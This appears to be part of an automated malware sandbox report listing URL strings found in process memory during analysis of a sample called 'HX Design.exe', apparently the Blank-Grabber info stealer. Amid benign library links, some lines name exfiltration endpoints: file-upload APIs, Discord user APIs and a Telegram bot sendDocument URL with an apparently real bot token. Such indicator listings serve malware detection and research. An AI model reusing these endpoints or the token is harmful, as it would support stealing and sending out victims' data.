              Source: powershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161/
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162#
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
              Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369e
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899t
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: HX Design.exe, 00000001.00000002.2103504052.00000294B5CBC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument
              Source: chrome.exe, 0000003A.00000003.1865540039.00000BFC002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000003.1865599305.00000BFC002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: HX Design.exe, 00000001.00000003.1690192379.00000294B44C2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1692808948.00000294B44CD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099793800.00000294B4850000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1693270635.00000294B44CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AFF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7AF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: HX Design.exe, 00000001.00000003.1698834268.00000294B4E5A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1699569937.00000294B4730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
              Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
              Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: HX Design.exe, 00000001.00000003.1702384127.00000294B4AB2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1702130112.00000294B4695000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920pk/
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 00000028.00000002.1879970672.000001D1830D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: msedge.exe, 0000003B.00000002.1928179785.000076D8001C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928116444.000076D8001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: msedge.exe, 0000003B.00000002.1928179785.000076D8001C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928116444.000076D8001BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/#
              Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: HX Design.exe, 00000001.00000002.2101621757.00000294B52BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
              Source: msedge.exe, 0000003B.00000002.1932291296.000076D800530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693preferSubmitOnAnySamplesPassedQueryEnd
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
              Source: HX Design.exe, 00000001.00000003.1701740081.00000294B46F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
              Source: powershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.py
              Source: HX Design.exe, 00000001.00000002.2101379289.00000294B5050000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: HX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
